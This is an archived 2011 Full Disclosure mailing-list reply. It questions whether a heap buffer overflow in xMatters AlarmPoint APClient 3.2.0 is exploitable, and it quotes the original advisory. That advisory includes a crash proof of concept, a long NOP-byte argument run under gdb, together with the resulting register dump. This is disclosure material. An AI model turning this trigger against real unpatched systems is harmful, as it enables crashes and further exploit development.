Full Disclosure mailing list archives
Re: Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient
From: Mario Vilas <mvilas () gmail com>
Date: Thu, 28 Apr 2011 14:40:22 -0300
Is the suid bit set on that binary? Otherwise, unless I'm missing something it doesn't seem to be exploitable by an attacker... On Thu, Apr 28, 2011 at 12:03 PM, Juan Sacco <jsacco () insecurityresearch com>wrote:
Information -------------------- Name : Heap Buffer Overflow in xMatters AlarmPoint APClient Version: APClient 3.2.0 (native) Software : xMatters AlarmPoint Vendor Homepage : http://www.xmatters.com Vulnerability Type : Heap Buffer Overflow Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin Severity : High Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com> Description ------------------ The AlarmPoint Java Server consists of a collection of software components and software APIs designed to provide a flexible and powerful set of tools for integrating various applications to AlarmPoint. Details ------------------- AlarmPoint APClient is affected by a Heap Overflow vulnerability in version APClient 3.2.0 (native) A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as the POSIX malloc() call. https://www.owasp.org/index.php/Heap_overflow Exploit as follow: Submit a malicious file cointaining the exploit root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$ ./APClient.bin --submit-file maliciousfile.hex or (gdb) run `python -c 'print "\x90"*16287'` Starting program: /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c 'print "\x90"*16287'` Program received signal SIGSEGV, Segmentation fault. 0x0804be8a in free () (gdb) i r eax 0xa303924 170932516 ecx 0xbfb8 49080 edx 0xa303924 170932516 ebx 0x8059438 134583352 esp 0xbfff3620 0xbfff3620 ebp 0xbfff3638 0xbfff3638 esi 0x8059440 134583360 edi 0x80653f0 134632432 eip 0x804be8a 0x804be8a <free+126> eflags 0x210206 [ PF IF RF ID ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) Solution ------------------- No patch are available at this time. Credits ------------------- Manual discovered by Insecurity Research Labs Juan Sacco - http://www.insecurityresearch.com -- -- _________________________________________________ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.5 was released stay tunned _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient Juan Sacco (Apr 28)
- Re: Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient Mario Vilas (Apr 28)
- Re: Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient Valdis . Kletnieks (Apr 28)
- Re: Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient ichib0d crane (Apr 28)
- Re: Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient ghost (Apr 28)
- Re: Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient ichib0d crane (Apr 28)
- Re: Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient -= Glowing Doom =- (Apr 29)
- Re: Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient Cal Leeming (Apr 29)
- Re: Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient Valdis . Kletnieks (Apr 28)
- Re: Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient Mario Vilas (Apr 28)
- Re: Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient Mario Vilas (Apr 28)
- Re: Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient -= Glowing Doom =- (Apr 29)
- Re: Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient R0me0 *** (Apr 29)